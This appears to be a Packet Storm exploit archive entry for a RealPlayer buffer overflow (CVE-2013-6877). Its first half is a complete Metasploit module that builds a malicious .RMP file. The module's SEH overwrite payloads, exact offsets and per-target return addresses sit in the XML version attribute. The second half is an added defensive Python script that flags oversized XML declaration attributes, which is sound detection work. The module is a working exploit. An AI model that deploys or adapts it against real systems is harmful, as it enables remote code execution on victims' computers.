RealNetworks RealPlayer Version Attribute Buffer Overflow

Published 26 Dec 2013. Reported by Gabor Seljan. Source: packetstorm (packetstormsecurity.com).

A stack-based buffer overflow in RealNetworks RealPlayer versions 16.0.3.51 and 16.0.2.32 allows remote code execution or an application crash when a specially crafted .RMP file is opened.

Code
```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'RealNetworks RealPlayer Version Attribute Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack-based buffer overflow vulnerability in
        version 16.0.3.51 and 16.0.2.32 of RealNetworks RealPlayer, caused by
        improper bounds checking of the version and encoding attributes inside
        the XML declaration.

        By persuading the victim to open a specially-crafted .RMP file, a
        remote attacker could execute arbitrary code on the system or cause
        the application to crash.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Gabor Seljan' # Vulnerability discovery and Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-6877' ],
          [ 'URL', 'http://service.real.com/realplayer/security/12202013_player/en/' ]
        ],
      'DefaultOptions' =>
        {
          'ExitFunction' => 'seh'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars' => "\x00\x22",
          'Space'    => 532,
        },
      'Targets'        =>
        [
          [ 'Windows XP SP2/SP3 (NX) / Real Player 16.0.3.51',
            {
              'OffsetClick' => 2540,       # Open via double click
              'OffsetMenu'  => 13600,      # Open via File -> Open
              'Ret'         => 0x641930C8  # POP POP RET from rpap3260.dll
            }
          ],
          [ 'Windows XP SP2/SP3 (NX) / Real Player 16.0.2.32',
            {
              'OffsetClick' => 2540,       # Open via double click
              'OffsetMenu'  => 13600,      # Open via File -> Open
              'Ret'         => 0x63A630B8  # POP POP RET from rpap3260.dll
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Dec 20 2013',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.rmp'])
      ],
      self.class)
  end

  def exploit
    # Pad to the first SEH offset (double-click open path), place the SEH
    # record, pad to the second offset (File -> Open path), place it again,
    # then append enough data to trigger the exception.
    sploit = rand_text_alpha_upper(target['OffsetClick'])
    sploit << generate_seh_payload(target.ret)
    sploit << rand_text_alpha_upper(target['OffsetMenu'] - sploit.length)
    sploit << generate_seh_payload(target.ret)
    sploit << rand_text_alpha_upper(17000) # Generate exception

    # Create the file: the whole buffer is the value of the XML version attribute
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create("<?xml version=\"" + sploit + "\"?>")
  end
end
```
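The module above produces a file whose entire payload sits inside the `version` attribute of the XML declaration. A defender-side triage check for that shape, added here as an example and not part of the original Packet Storm or Metasploit code: it measures the attribute values in the `<?xml ... ?>` prolog and flags anything far beyond what a well-formed declaration can hold. The limits and the sample inputs are constructed assumptions, not values from the advisory.

```python
import re
import sys

# Upper bounds for the only attributes an XML declaration may carry (assumed limits).
# XML 1.0 VersionNum is "1." plus digits, encoding names are short tokens and
# standalone is "yes" or "no"; anything longer is malformed and worth flagging.
LIMITS = {b'version': 8, b'encoding': 32, b'standalone': 3}


def inspect_xml_declaration(data: bytes) -> dict:
    """Measure the attribute values in the leading <?xml ... ?> declaration.

    Returns {'suspicious': bool, 'reasons': [str], 'attrs': {name: value_len}}.
    Only the prolog is examined, so the check stays cheap on large files.
    """
    result = {'suspicious': False, 'reasons': [], 'attrs': {}}
    head = data.lstrip()
    if not head.startswith(b'<?xml'):
        result['reasons'].append('no XML declaration at start of file')
        return result
    end = head.find(b'?>')
    # A declaration with no terminator is itself abnormal; still scan what is there.
    decl = head[5:] if end == -1 else head[5:end]
    if end == -1:
        result['suspicious'] = True
        result['reasons'].append('XML declaration is never closed')
    for name, limit in LIMITS.items():
        m = re.search(rb'\b' + name + rb'\s*=\s*(["\'])', decl)
        if not m:
            continue
        quote, start = m.group(1), m.end()
        close = decl.find(quote, start)  # -1 means the value is never closed
        value_len = (len(decl) if close == -1 else close) - start
        result['attrs'][name.decode()] = value_len
        if close == -1 or value_len > limit:
            result['suspicious'] = True
            result['reasons'].append(
                f'{name.decode()} value is {value_len} bytes, limit {limit}')
    return result


# Constructed samples: a minimal well-formed prolog, and a prolog shaped like the
# module's output (an oversized version value) without reproducing its bytes.
BENIGN = b'<?xml version="1.0" encoding="UTF-8"?>\n<rmp/>'
MALFORMED = b'<?xml version="' + b'A' * 30000 + b'"?>'

if __name__ == '__main__':
    for path in sys.argv[1:]:
        with open(path, 'rb') as fh:
            verdict = inspect_xml_declaration(fh.read(65536))
        print(path, 'SUSPICIOUS' if verdict['suspicious'] else 'ok', verdict['reasons'])
```

Run it over a quarantine directory of .RMP files to pick out candidates for deeper analysis; a genuine playlist keeps its version value at three bytes.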
